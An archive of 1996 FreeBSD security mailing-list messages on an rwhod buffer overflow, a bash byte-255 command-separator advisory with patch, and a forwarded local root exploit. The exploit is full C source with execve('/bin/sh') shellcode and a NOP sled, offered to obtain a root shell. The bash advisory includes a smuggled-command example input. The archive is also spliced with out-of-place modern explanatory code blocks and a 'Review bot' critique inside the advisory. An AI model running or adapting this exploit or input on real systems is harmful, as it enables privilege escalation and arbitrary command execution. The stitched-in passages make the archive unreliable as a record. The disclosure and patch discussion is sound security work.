From owner-freebsd-security Tue Aug 20 08:21:10 1996
From: Andrey A. Chernov
Organization: self
To: mark@grondar.za (Mark Murray)
Cc: current@freebsd.org, security@freebsd.org
Date: Tue, 20 Aug 1996 19:09:29 +0400 (MSD)
Subject: Re: Secure telnet duplicating: secure & eBones both...
Message-Id: <199608201509.TAA00886@nagual.ru>
In-Reply-To: <199608201449.QAA24308@grumble.grondar.za> from "Mark Murray" at "Aug 20, 96 04:49:38 pm"

> Whatever happens, no matter how many security features are in Secure Telnet,
> it will still require the Kerberos libraries.

It does NOT require the Kerberos libraries, please look closely into the Makefiles.
I see no reason again for moving it into eBones.

--
Andrey A. Chernov
http://www.nagual.ru/~ache/

From owner-freebsd-security Wed Aug 21 13:45:10 1996
From: "David J. Meltzer"
To: bugtraq@netspace.org, linux-security@tarsier.cv.nrao.edu, freebsd-security@freebsd.org, deraadt@theos.com
Date: Wed, 21 Aug 1996 16:38:57 -0400 (EDT)
Subject: rwhod buffer overflow
In-Reply-To: <199607240541.BAA18220@hcs.HARVARD.EDU>

There is a remote buffer overflow in the path variable in rwhod.c in the line:

    (void) sprintf(path, "whod.%s", wd.wd_hostname);

Although wd_hostname is defined to be only 32 characters, it is read as part of the wd structure from a remote host through a UDP packet and can be as large as the remainder of the structure starting at that point.

Through examining the source this appears to be a problem in current OpenBSD, NetBSD, FreeBSD, and Linux distributions. Through penetration testing I have also found this problem present on AIX; I have not examined other platforms running rwhod and so do not know about their potential vulnerability.

I have successfully exploited this remotely to produce undesirable effects (segfaults and overwriting argv[0] on different OSes). I have not spent sufficient time on this to determine exactly how/if to compromise root directly with this overflow, but it is definitely something that should be corrected.
I would suggest prior to the sprintf line you add something to the effect:

    if(strlen(wd.wd_hostname) >= sizeof(wd.wd_hostname)) {
        syslog(LOG_WARNING,
            "possible hostname overflow attack apparently from %x",
            from.sin_addr);
        continue;
    }

Program:                    /usr/sbin/rwhod
Affected Operating Systems: OpenBSD, NetBSD, FreeBSD, Linux, AIX, others.
                            rwhod must be running on the system
Requirements:               Ability to send UDP packet to target host
Security Compromise:        Possible denial of service, Possible annoyance,
                            Possibly root compromise?
Author:                     Dave M. (davem@iss.net)
Synopsis:                   rwhod reads a structure from a udp packet and does
                            not check the hostname member of the structure for
                            being the expected size.

--------------------------------+---------------------
David J. Meltzer                | Email: davem@iss.net
Systems Engineer                | Web:   www.iss.net
Internet Security Systems, Inc. | Fax:   (404)252-2427
--------------------------------+---------------------
From owner-freebsd-security Wed Aug 21 16:02:28 1996
From: David Holland
To: bugtraq@netspace.org, linux-security@tarsier.cv.NRAO.edu, freebsd-security@freebsd.org, deraadt@theos.com
Date: Wed, 21 Aug 1996 19:02:15 -0400 (EDT)
Subject: Re: rwhod buffer overflow
Message-Id: <199608212302.TAA09928@hcs.harvard.edu>

> Through examining the source this appears to be a problem in current
> OpenBSD, NetBSD, FreeBSD, and Linux distributions.

Yes - I only found the bug last week. I was waiting to post it until I could track down an appropriate FreeBSD contact to get the fixes applied. Ah well.

The fixed Linux version will be released in NetKit-B-0.08 tonight. The NetKit-B release has been delayed by considerations over the RESOLV_HOST_CONF problem. :(

I know the fix has been applied to OpenBSD, and it's at least been sent to NetBSD...

--
- David A. Holland
                         | Number of words in the English language that
dholland@hcs.harvard.edu | exist because of typos or misreadings: 381

From owner-freebsd-security Wed Aug 21 19:12:45 1996
Resent-From: best-of-security@suburbia.net
Resent-Date: Thu, 22 Aug 1996 10:54:43 +1000
Approved-By: ALEPH1@UNDERGROUND.ORG
Approved-By: "David J. Meltzer"
Reply-To: Bugtraq List
Date: Wed, 21 Aug 1996 16:38:57 -0400
From: "David J. Meltzer"
To: Multiple recipients of list BUGTRAQ
In-Reply-To: <199607240541.BAA18220@hcs.HARVARD.EDU>
Resent-Message-Id: <"yhhSK1.0.VU7.I_w6o"@suburbia>
Subject: BoS: rwhod buffer overflow

There is a remote buffer overflow in the path variable in rwhod.c in the line:

    (void) sprintf(path, "whod.%s", wd.wd_hostname);

Although wd_hostname is defined to be only 32 characters, it is read as part of the wd structure from a remote host through a UDP packet and can be as large as the remainder of the structure starting at that point.

Through examining the source this appears to be a problem in current OpenBSD, NetBSD, FreeBSD, and Linux distributions. Through penetration testing I have also found this problem present on AIX; I have not examined other platforms running rwhod and so do not know about their potential vulnerability.

I have successfully exploited this remotely to produce undesirable effects (segfaults and overwriting argv[0] on different OSes). I have not spent sufficient time on this to determine exactly how/if to compromise root directly with this overflow, but it is definitely something that should be corrected.

I would suggest prior to the sprintf line you add something to the effect:

    if(strlen(wd.wd_hostname) >= sizeof(wd.wd_hostname)) {
        syslog(LOG_WARNING,
            "possible hostname overflow attack apparently from %x",
            from.sin_addr);
        continue;
    }

Program:                    /usr/sbin/rwhod
Affected Operating Systems: OpenBSD, NetBSD, FreeBSD, Linux, AIX, others.
                            rwhod must be running on the system
Requirements:               Ability to send UDP packet to target host
Security Compromise:        Possible denial of service, Possible annoyance,
                            Possibly root compromise?
Author:                     Dave M. (davem@iss.net)
Synopsis:                   rwhod reads a structure from a udp packet and does
                            not check the hostname member of the structure for
                            being the expected size.

--------------------------------+---------------------
David J. Meltzer                | Email: davem@iss.net
Systems Engineer                | Web:   www.iss.net
Internet Security Systems, Inc. | Fax:   (404)252-2427
--------------------------------+---------------------

From owner-freebsd-security Thu Aug 22 09:07:40 1996
From: Cy Schubert - ITSD Open Systems Group
Reply-to: cschuber@orca.gov.bc.ca
To: security-officer@freebsd.org
cc: freebsd-security@freebsd.org
Date: Thu, 22 Aug 96 09:07:29 -0700
Subject: Mycroftish description of bash hole.
Message-Id: <199608221607.JAA02475@passer.osg.gov.bc.ca>

This is an FYI for those of you who have installed the bash port.

Regards,                       Phone:    (604)389-3827
Cy Schubert                    OV/VM:    BCSC02(CSCHUBER)
Open Systems Support           BITNET:   CSCHUBER@BCSC02.BITNET
ITSD                           Internet: cschuber@uumail.gov.bc.ca
                                         cschuber@bcsc02.gov.bc.ca

"Quit spooling around, JES do it."
------- Forwarded Message

From: "Matthew Aldous"
To: meditation@gnu.ai.mit.edu
Date: Thu, 22 Aug 1996 16:26:56 -0400
Message-Id: <9608221626.ZM5530@discovery.mhri.edu.au>
Resent-From: best-of-security@suburbia.net
Resent-Date: Thu, 22 Aug 1996 19:10:29 +1000
Subject: BoS: Mycroftish description of bash hole.

Whilst I know you might not care for security problems on meditation, I just wanted to splode over the description of *why* this problem exists. (If you read section B, it's very mycroftish.)

- ------------------------------------------------------------------------------

    register char *string;

vs.
    register unsigned char *string;

- ------------------------------------------------------------------------------

Matt

- -----BEGIN PGP SIGNED MESSAGE-----

AUSCERT has received the following Alert from the IBM ERS team concerning a vulnerability in the GNU "bash" shell. It is passed on for your information.

If you believe that your system has been compromised, contact AUSCERT or your representative in FIRST (Forum of Incident Response and Security Teams).

AUSCERT maintains an anonymous FTP service which is found on: ftp://ftp.auscert.org.au/pub/. This archive contains past SERT and AUSCERT Advisories, and other computer security information.

AUSCERT also maintains a World Wide Web service which is found on: http://www.auscert.org.au/.

Internet Email: auscert@auscert.org.au
Facsimile:      (07) 3365 4477
Telephone:      (07) 3365 4417 (International: +61 7 3365 4417)
                AUSCERT personnel answer during Queensland business hours
                which are GMT+10:00 (AEST). On call after hours for emergencies.

- - -- Begin Included Advisory --

- - --ERS-ALERT--ERS-ALERT--ERS-ALERT--ERS-ALERT--ERS-ALERT--ERS-ALERT--ERS-ALERT--
- - ---EXTERNAL RELEASE---EXTERNAL RELEASE---EXTERNAL RELEASE---EXTERNAL RELEASE---

                          EMERGENCY RESPONSE SERVICE
                         SECURITY VULNERABILITY ALERT

21 August 1996 13:00 GMT                         Number: ERS-SVA-E01-1996:004.1
===============================================================================
                             VULNERABILITY SUMMARY

VULNERABILITY:  A variable declaration error in "bash" allows the character
                with value 255 decimal to be used as a command separator.

PLATFORMS:      Bash 1.14.6 and earlier versions.

SOLUTION:       Apply the patch provided below.
THREAT:         When used in environments where users provide strings to be
                used as commands or arguments to commands, "bash" can be
                tricked into executing arbitrary commands.

===============================================================================
                             DETAILED INFORMATION

I. Description

   A. Introduction

   The GNU Project's Bourne Again SHell ("bash") is a drop-in replacement for the UNIX Bourne shell (/bin/sh). It offers the same syntax as the standard shell, but also includes additional functionality such as job control, command line editing, and history.

   Although "bash" can be compiled and installed on almost any UNIX platform, its most prevalent use is on "free" versions of UNIX such as Linux, where it has been installed as "/bin/sh" (the default shell for most uses).

   The "bash" source code is freely available from many sites on the Internet.

   B. Vulnerability Details

   There is a variable declaration error in the "yy_string_get()" function in the "parser.y" module of the "bash" source code. This function is responsible for parsing the user-provided command line into separate tokens (commands, special characters, arguments, etc.).

   The error involves the variable "string," which has been declared to be of type "char *." The "string" variable is used to traverse the character string containing the command line to be parsed. As characters are retrieved from this pointer, they are stored in a variable of type "int." On systems/compilers where the "char" type defaults to "signed char", this value will be sign-extended when it is assigned to the "int" variable. For character code 255 decimal (-1 in two's complement form), this sign extension results in the value (-1) being assigned to the integer.

   However, (-1) is used in other parts of the parser to indicate the end of a command. Thus, the character code 255 decimal (377 octal) will serve as an unintended command separator for commands given to "bash" via the "-c" option.
   For example,

       bash -c 'ls\377who'

   (where "\377" represents the single character with value 255 decimal) will execute two commands, "ls" and "who."

II. Impact

   This unexpected command separator can be dangerous, especially on systems such as Linux where "bash" has been installed as "/bin/sh," when a program executes a command with a string provided by a user as an argument using the "system()" or "popen()" functions (or by calling "/bin/sh -c string" directly).

   This is especially true for the CGI programming interface in World Wide Web servers, many of which do not strip out characters with value 255 decimal. If a user sending data to the server can specify the character code 255 in a string that is passed to a shell, and that shell is "bash," the user can execute any arbitrary command with the user-id and permissions of the user running the server (frequently "root").

   The "bash" built-in commands "eval," "source," and "fc" are also potentially vulnerable to this problem.

III. Solutions

   A. How to alleviate the problem

   This problem can be alleviated by changing the declaration of the "string" variable in the "yy_string_get()" function from "char *" to "unsigned char *."

   B. Official fix from the "bash" maintainers

   The "bash" maintainers have told us they plan to fix this problem in Version 2.0 of "bash," but this will not be released for at least a few more months.

   C. Unofficial fix until the official version is released

   Until the "bash" maintainers release Version 2.0, this problem can be fixed by applying the patch below to the "bash" source code, recompiling the program, and installing the new version.

   The patch below is for Version 1.14.6 of "bash." Source code for this version can be obtained from ftp://prep.ai.mit.edu/pub/gnu/bash-1.14.6.tar.gz as well as many other sites around the Internet.
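The sign-extension mechanism described in section I.B and the `ls\377who` example above, worked through in code. This is an added illustration, not part of the advisory and not bash's source: `string_get_signed()` and `string_get_unsigned()` are stand-ins for the two versions of `yy_string_get()` (the first reads through a `signed char *` so the fault reproduces even on a platform where plain `char` is unsigned), `count_commands()` is a deliberately minimal model of a parser that treats -1 as end-of-command and is not bash's grammar, and `find_byte_255()` is the input check a CGI program calling `system()` or `popen()` would want.

```c
#include <limits.h>
#include <stdio.h>
#include <string.h>

/* Whether plain "char" is signed on the compiling platform; the advisory's
 * bug only bites where it is. */
int plain_char_is_signed(void)
{
    return CHAR_MIN < 0;
}

/* Stand-ins for yy_string_get(): return the next byte widened to int and
 * advance, or -1 (the parser's end-of-command sentinel) at the NUL.
 * The signed variant forces the sign extension the advisory describes. */
static int string_get_signed(const char **cursor)
{
    int c = *(const signed char *)*cursor;   /* byte 0xFF becomes -1 here */
    if (c == 0)
        return -1;
    (*cursor)++;
    return c;
}

static int string_get_unsigned(const char **cursor)
{
    int c = *(const unsigned char *)*cursor; /* 0..255, never collides with -1 */
    if (c == 0)
        return -1;
    (*cursor)++;
    return c;
}

/* Minimal model of the parser's control flow: -1 terminates the current
 * command, and parsing stops only when the input is really exhausted.
 * Returns how many commands the input was split into. */
int count_commands(const char *input, int (*get)(const char **))
{
    const char *cur = input;
    int commands = 0, in_command = 0;

    for (;;) {
        int c = get(&cur);
        if (c == -1) {
            if (in_command) {
                commands++;
                in_command = 0;
            }
            if (*cur == '\0')
                break;      /* genuine end of input */
            continue;       /* sign-extended 0xFF: the parser begins a new command */
        }
        in_command = 1;
    }
    return commands;
}

/* Defender-side check for code that hands user strings to a shell:
 * offset of the first byte with value 255, or -1 if there is none. */
int find_byte_255(const char *s)
{
    const char *hit = memchr(s, 0xFF, strlen(s));
    return hit ? (int)(hit - s) : -1;
}

int main(void)
{
    const char *cmd = "ls\377who";   /* constructed input: "ls", byte 255, "who" */

    printf("plain char is %s here\n", plain_char_is_signed() ? "signed" : "unsigned");
    printf("signed parser:   %d command(s)\n", count_commands(cmd, string_get_signed));
    printf("unsigned parser: %d command(s)\n", count_commands(cmd, string_get_unsigned));
    printf("byte 255 found at offset %d\n", find_byte_255(cmd));
    return 0;
}
```

With the signed reader the six-byte input is reported as two commands, with the unsigned reader as one; that difference is the whole advisory. `find_byte_255()` is the complementary mitigation for the CGI case in section II: reject or strip the byte before the string ever reaches `/bin/sh -c`, independent of which shell is installed.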
- - ---------------------------------- cut here - ----------------------------------
*** parse.y.old	Thu Nov  2 15:00:51 1995
- - --- parse.y	Tue Aug 20 09:16:48 1996
***************
*** 904,910 ****
  static int
  yy_string_get ()
  {
!   register char *string;
    register int c;
  
    string = bash_input.location.string;
- - --- 904,910 ----
  static int
  yy_string_get ()
  {
!   register unsigned char *string;
    register int c;
  
    string = bash_input.location.string;
- - ---------------------------------- cut here - ----------------------------------

   To apply this patch, save the text between the two "--- cut here ---" lines to a file, change directories to the "bash" source directory, and issue the command

       patch < filename

   If you do not have the "patch" program, you can obtain it from ftp://prep.ai.mit.edu/pub/gnu/patch-2.1.tar.gz or you can apply the patch by hand.

   After applying the patch, recompile and reinstall the "bash" program by following the directions in the "INSTALL" file, included as part of the "bash" distribution.

   This patch is provided "AS IS" without warranty of any kind, including, without limitation, any implied warranties of merchantability or fitness for a particular purpose. This advisory does not create or imply any support obligations or any other liability on the part of IBM or its subsidiaries.

IV. Acknowledgements

   IBM-ERS would like to thank the IBM Global Security Analysis Laboratory at the IBM T. J. Watson Research Center for their discovery of this vulnerability, bringing it to our attention, providing the patch to fix it, and assistance in developing this alert.

UNIX is a technology trademark of X/Open Company, Ltd.
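Review bot: in the `*** 904,910 ****` hunk the only changed line is `!   register unsigned char *string;`, while the retained context line `string = bash_input.location.string;` still assigns from the original pointer; if that member stays `char *`, the assignment now converts between pointer types of different signedness and compilers will warn, so either cast at the assignment or change the member's declaration in the same patch. The file header names `parse.y`, but section I.B of the alert calls the module "parser.y"; one spelling should be used throughout. Section II also lists the `eval`, `source` and `fc` built-ins as potentially vulnerable, yet neither the patch nor the text says whether this single declaration change covers those paths; a sentence confirming the scope of the fix would help.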
===============================================================================

IBM's Internet Emergency Response Service (IBM-ERS) is a subscription-based Internet security response service that includes computer security incident response and management, regular electronic verification of your Internet gateway(s), and security vulnerability alerts similar to this one that are tailored to your specific computing environment. By acting as an extension of your own internal security staff, IBM-ERS's team of Internet security experts helps you quickly detect and respond to attacks and exposures across your Internet connection(s).

As a part of IBM's Business Recovery Services organization, the IBM Internet Emergency Response Service is a component of IBM's SecureWay(tm) line of security products and services. From hardware to software to consulting, SecureWay solutions can give you the assurance and expertise you need to protect your valuable business resources. To find out more about the IBM Internet Emergency Response Service, send an electronic mail message to ers-sales@vnet.ibm.com, or call 1-800-742-2493 (Prompt 4).

IBM-ERS maintains a site on the World Wide Web at http://www.ers.ibm.com/. Visit the site for information about the service, copies of security alerts, team contact information, and other items.

IBM-ERS uses Pretty Good Privacy* (PGP*) as the digital signature mechanism for security vulnerability alerts and other distributed information. The IBM-ERS PGP* public key is available from http://www.ers.ibm.com/team-info/pgpkey.html.

"Pretty Good Privacy" and "PGP" are trademarks of Philip Zimmerman.

IBM-ERS is a Member Team of the Forum of Incident Response and Security Teams (FIRST), a global organization established to foster cooperation and response coordination among computer security teams worldwide.

Copyright 1996 International Business Machines Corporation.
The information in this document is provided as a service to customers of the IBM Emergency Response Service. Neither International Business Machines Corporation, Integrated Systems Solutions Corporation, nor any of their employees, makes any warranty, express or implied, or assumes any legal liability or responsibility for the accuracy, completeness, or usefulness of any information, apparatus, product, or process contained herein, or represents that its use would not infringe any privately owned rights. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not necessarily constitute or imply its endorsement, recommendation or favoring by IBM or its subsidiaries. The views and opinions of authors expressed herein do not necessarily state or reflect those of IBM or its subsidiaries, and may not be used for advertising or product endorsement purposes.

The material in this security alert may be reproduced and distributed, without permission, in whole or in part, by other security incident response teams (both commercial and non-commercial), provided the above copyright is kept intact and due credit is given to IBM-ERS.

This security alert may be reproduced and distributed, without permission, in its entirety only, by any person provided such reproduction and/or distribution is performed for non-commercial purposes and with the intent of increasing the awareness of the Internet community.
- - ---EXTERNAL RELEASE---EXTERNAL RELEASE---EXTERNAL RELEASE---EXTERNAL RELEASE---
- - --ERS-ALERT--ERS-ALERT--ERS-ALERT--ERS-ALERT--ERS-ALERT--ERS-ALERT--ERS-ALERT--

- - -- End Included Advisory --

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Finger pgp@ftp.auscert.org.au to retrieve AUSCERT's public key

iQCVAwUBMhx7xCh9+71yA2DNAQGktAP8D5SBbZRrdn9vgVzjMO6ZtapWmudSAlm+
QUmYzGebC9AxndCkciZX94CqAfdg/aBJY6i6/Z0+R8DHy1ndABbQ4iGirzot9I2V
TIFUktCvxdifRGR4wTKLHTwFaFdW+b0R2GDhDsF05qf5vKF27qwameQKV0Smo3tA
QpK8oLlQO4s=
=/JYb
- -----END PGP SIGNATURE-----

- --
- -------------------------------------------------------------------------------
"System Administration: It's a dirty job, but someone said I had to do it."
Matthew Aldous : 019339629 : mda@mhri.edu.au : Mental Health Research Institute
- -------------------------------------------------------------------------------

------- End of Forwarded Message

From owner-freebsd-security Thu Aug 22 10:14:49 1996
Date: Thu, 22 Aug 1996 13:13:55 -0400
From: "Joseph S. D. Yao"
Message-Id: <199608221713.NAA29924@cais2.cais.com>
To: bugtraq@netspace.org, davem@iss.net, deraadt@theos.com, freebsd-security@freebsd.org, linux-security@tarsier.cv.nrao.edu
Subject: Re: [linux-security] rwhod buffer overflow

> There is a remote buffer overflow in the path variable in rwhod.c in the
> line:
>     (void) sprintf(path, "whod.%s", wd.wd_hostname);
...
> I would suggest prior to the sprintf line you add something to the effect:
>     if(strlen(wd.wd_hostname) >= sizeof(wd.wd_hostname)) {
>         syslog(LOG_WARNING, "possible hostname overflow attack apparently from %x",
>             from.sin_addr);
>         continue;
>     }

You might also wish to modify the sprintf() as follows. Just because wd_hostname fits into wd doesn't mean (in some future revision) that it will fit into path.

    static char path_prefix[] = "whod.";

    /* the precision argument of "%.*s" must be an int, hence the cast */
    (void) sprintf(path, "%s%.*s", path_prefix,
        (int)(sizeof(path) - sizeof(path_prefix)), wd.wd_hostname);

The above assumes that path is an array, rather than a pointer: I haven't looked. If it's a pointer, then change sizeof(path) to the defined constant that reliably defines the size of the array to which path points.

This also neatly accounts for the terminating NUL, because that is measured in sizeof(path_prefix), but not copied over by "%s" in the sprintf() call.

Yes, this will truncate some LONG host names. A better algorithm would find the combined lengths of the path_prefix + the hostname, allocate a buffer at least that long + 1 (if not already allocated), die or skip the host if the alloc fails (so many programs forget to check!!!), and then do the copy, freeing the buffer when [if] it's no longer being used. But that's a bigger patch than the above. [;-\]

Joe Yao                                 jsdy@cais.com - Joseph S. D. Yao
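David Meltzer's termination check and Joe Yao's bounded format, combined into one validation path for the incoming datagram. This is an added example, not rwhod's code and not either poster's patch: `struct whod_hdr` is a reduced, constructed layout in which only the 32-byte `wd_hostname` field and its existence as part of a UDP record come from the thread (the other fields, their sizes and the function names are assumptions), the check uses a bounded `memchr()` rather than `strlen()` so that the check itself cannot read past the field when no NUL is present, truncation of the result is treated as a rejection rather than silently accepted, and the refusal of `/` in a value that becomes part of a file name is an extra hardening step not discussed in the thread.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Reduced, constructed model of the on-the-wire whod record.  Only the
 * 32-byte hostname field is taken from the discussion; the rest is assumed. */
struct whod_hdr {
    uint8_t  wd_vers;
    uint8_t  wd_type;
    uint8_t  wd_pad[2];
    uint32_t wd_sendtime;
    uint32_t wd_recvtime;
    char     wd_hostname[32];
    uint32_t wd_loadav[3];
    /* per-user entries follow in the real protocol */
};

/* Hostname validation for a record that arrived over UDP: the field must be
 * NUL-terminated inside its 32 bytes, non-empty, and free of '/' because the
 * value is spliced into a file name.  memchr() is bounded by the field size,
 * so an unterminated field cannot make the check itself over-read. */
int whod_hostname_ok(const struct whod_hdr *wd)
{
    const char *end = memchr(wd->wd_hostname, '\0', sizeof wd->wd_hostname);
    if (end == NULL || end == wd->wd_hostname)
        return 0;
    return memchr(wd->wd_hostname, '/', (size_t)(end - wd->wd_hostname)) == NULL;
}

/* Builds "whod.<hostname>" into a caller-supplied buffer.  Returns 0 on
 * success, -1 if the record is rejected or the result would not fit; the
 * "%.*s" precision is belt and braces on top of the termination check. */
int whod_build_path(const struct whod_hdr *wd, char *path, size_t pathsz)
{
    if (!whod_hostname_ok(wd))
        return -1;
    int n = snprintf(path, pathsz, "whod.%.*s",
                     (int)sizeof wd->wd_hostname, wd->wd_hostname);
    return (n < 0 || (size_t)n >= pathsz) ? -1 : 0;
}

/* Entry point for a raw datagram: refuses short packets before any field
 * is read, then applies the checks above. */
int whod_parse(const unsigned char *pkt, size_t len, char *path, size_t pathsz)
{
    struct whod_hdr wd;
    if (len < sizeof wd)
        return -1;
    memcpy(&wd, pkt, sizeof wd);
    return whod_build_path(&wd, path, pathsz);
}

/* Constructs a sample record (not captured traffic); hostlen may be the
 * full 32 bytes to build an unterminated field like the one in the report. */
void make_record(struct whod_hdr *wd, const char *host, size_t hostlen)
{
    memset(wd, 0, sizeof *wd);
    wd->wd_vers = 1;
    wd->wd_type = 1;
    if (hostlen > sizeof wd->wd_hostname)
        hostlen = sizeof wd->wd_hostname;
    memcpy(wd->wd_hostname, host, hostlen);
}

int main(void)
{
    struct whod_hdr wd;
    char path[64];

    make_record(&wd, "alpha", 5);
    printf("terminated hostname:   rc=%d path=%s\n",
           whod_build_path(&wd, path, sizeof path), path);

    make_record(&wd, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", 32);  /* 32 bytes, no NUL */
    printf("unterminated hostname: rc=%d\n", whod_build_path(&wd, path, sizeof path));
    return 0;
}
```

The first record yields `whod.alpha`; the second, a 32-byte field with no terminator, is rejected before any formatting happens, which is the case the original `sprintf()` mishandles. The daemon's response to a rejected record (log and `continue`, as Meltzer suggests) stays with the caller.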
From owner-freebsd-security Fri Aug 23 11:16:07 1996
From: Julian Elischer
Organization: Whistle Communications
To: security@freebsd.org
Date: Fri, 23 Aug 1996 11:11:23 -0700
Subject: [Fwd: mount bug..]
Message-ID: <321DF44B.6201DD56@whistle.com>

This doesn't work, but I'm wondering why it says it's for freeBSD.. did it work on an earlier version? (even with bin replaced by sbin)

umount is not suid anyhow, but.....
does anyone know about this?
julian

From: Adrian Chadd
To: digger@omen.com.au, julian@whistle.com
Date: Fri, 23 Aug 1996 09:52:16 +0800 (WST)
Subject: mount bug..
Message-Id: <199608230152.JAA16860@wisdom.psinet.net.au>

Here is the source to try out on your system:

    /*
     * Mount Exploit for Linux/FreeBSD, Jul 30 1996
     *
     * Discovered and Coded by Bloodmask & Vio
     * Covin 1996
     */

    #include
    #include
    #include
    #include
    #include

    #define PATH_MOUNT "/bin/umount"
    #define BUFFER_SIZE 1024
    #define DEFAULT_OFFSET 50

    u_long get_esp()
    {
        __asm__("movl %esp, %eax");
    }

    main(int argc, char **argv)
    {
        u_char execshell[] =
            "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
            "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
            "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
        char *buff = NULL;
        unsigned long *addr_ptr = NULL;
        char *ptr = NULL;
        int i;
        int ofs = DEFAULT_OFFSET;

        buff = malloc(4096);
        if(!buff) {
            printf("can't allocate memory\n");
            exit(0);
        }
        ptr = buff;

        /* fill start of buffer with nops */
        memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
        ptr += BUFFER_SIZE-strlen(execshell);

        /* stick asm code into the buffer */
        for(i=0;i < strlen(execshell);i++)
            *(ptr++) = execshell[i];

        addr_ptr = (long *)ptr;
        for(i=0;i < (8/4);i++)
            *(addr_ptr++) = get_esp() + ofs;
        ptr = (char *)addr_ptr;
        *ptr = 0;

        (void)alarm((u_int)0);
        printf("Discovered and Coded by Bloodmask and Vio, Covin 1996\n");
        execl(PATH_MOUNT, "mount", buff, NULL);
    }

Basically it gives you a root shell.. might want to take a look at it. It works in Linux.. I don't have a freebsd system to try it out on at the moment however.
Adrian Chadd

--------------63DECDAD62319AC452BFA1D7--

From owner-freebsd-security Sat Aug 24 03:14:11 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id DAA25307 for security-outgoing; Sat, 24 Aug 1996 03:14:11 -0700 (PDT)
Received: from gvr.win.tue.nl (root@gvr.win.tue.nl [131.155.210.19]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id DAA25300 for ; Sat, 24 Aug 1996 03:14:06 -0700 (PDT)
Received: by gvr.win.tue.nl (8.6.13/1.53) id MAA04792; Sat, 24 Aug 1996 12:13:56 +0200
From: guido@gvr.win.tue.nl (Guido van Rooij)
Message-Id: <199608241013.MAA04792@gvr.win.tue.nl>
Subject: Re: [Fwd: mount bug..]
To: julian@whistle.com (Julian Elischer)
Date: Sat, 24 Aug 1996 12:13:55 +0200 (MET DST)
Cc: security@freebsd.org
In-Reply-To: <321DF44B.6201DD56@whistle.com> from Julian Elischer at "Aug 23, 96 11:11:23 am"
X-Mailer: ELM [version 2.4ME+ PL17 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

Julian Elischer wrote:
> This doesn't work, but I'm wondering why it says it's for freeBSD..
> did it work on an earlier version? (even with bin replaced by sbin)
>
> umount is not suid anyhow, but.....
> does anyone know about this?

Since they use umount to do the exploit I cannot imagine how they would
ever get a root shell....umount is not suid.
-Guido

From owner-freebsd-security Sat Aug 24 04:23:30 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id EAA28460 for security-outgoing; Sat, 24 Aug 1996 04:23:30 -0700 (PDT)
Received: from godzilla.zeta.org.au (godzilla.zeta.org.au [203.2.228.19]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id EAA28454 for ; Sat, 24 Aug 1996 04:23:20 -0700 (PDT)
Received: (from bde@localhost) by godzilla.zeta.org.au (8.6.12/8.6.9) id VAA25541; Sat, 24 Aug 1996 21:21:00 +1000
Date: Sat, 24 Aug 1996 21:21:00 +1000
From: Bruce Evans
Message-Id: <199608241121.VAA25541@godzilla.zeta.org.au>
To: guido@gvr.win.tue.nl, julian@whistle.com
Subject: Re: [Fwd: mount bug..]
Cc: security@freebsd.org
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

>Julian Elischer wrote:
>> This doesn't work, but I'm wondering why it says it's for freeBSD..
>> did it work on an earlier version? (even with bin replaced by sbin)
>>
>> umount is not suid anyhow, but.....
>> does anyone know about this?

>Since they use umount to do the exploit I cannot imagine how they would
>ever get a root shell....umount is not suid.

Neither is mount. IIRC, among our mount routines, only mount_msdos and
mount_union have ever been setuid. Only mount_msdos is setuid now.

msdosfs alone allows mounting if the real uid is 0 or the real uid matches
the proposed mount point's uid. msdosfs_mount has to be setuid root to
defeat the suser() check in mount(). Blech. Controlling things using the
permissions of the mount point may be good, but it shouldn't be special.
Bruce

From owner-freebsd-security Sat Aug 24 13:05:29 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id NAA25349 for security-outgoing; Sat, 24 Aug 1996 13:05:29 -0700 (PDT)
Received: from silcon.silcon.com (silcon.silcon.com [206.99.109.10]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id NAA25343 for ; Sat, 24 Aug 1996 13:05:25 -0700 (PDT)
Received: (from dmessiah@localhost) by silcon.silcon.com (8.7.5/8.6.9) id NAA17984; Sat, 24 Aug 1996 13:05:59 -0700 (PDT)
Date: Sat, 24 Aug 1996 13:05:59 -0700 (PDT)
From: Evan Brewer
X-Sender: dmessiah@silcon
To: freebsd-security@freebsd.org
Subject: possible mailing list
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

subscribe dmessiah@silcon.com

From owner-freebsd-security Sat Aug 24 15:44:40 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id PAA06089 for security-outgoing; Sat, 24 Aug 1996 15:44:40 -0700 (PDT)
Received: from whistle.com (s205m131.whistle.com [207.76.205.131]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id PAA06080 for ; Sat, 24 Aug 1996 15:44:38 -0700 (PDT)
Received: (from smap@localhost) by whistle.com (8.7.5/8.6.12) id PAA11910; Sat, 24 Aug 1996 15:43:59 -0700 (PDT)
Received: from current1.whistle.com(207.76.205.22) by whistle.com via smap (V1.3) id sma011906; Sat Aug 24 15:43:33 1996
Message-ID: <321F855A.7A5F06AF@whistle.com>
Date: Sat, 24 Aug 1996 15:42:34 -0700
From: Julian Elischer
Organization: Whistle Communications
X-Mailer: Mozilla 3.0b6 (X11; I; FreeBSD 2.2-CURRENT i386)
MIME-Version: 1.0
To: Guido van Rooij
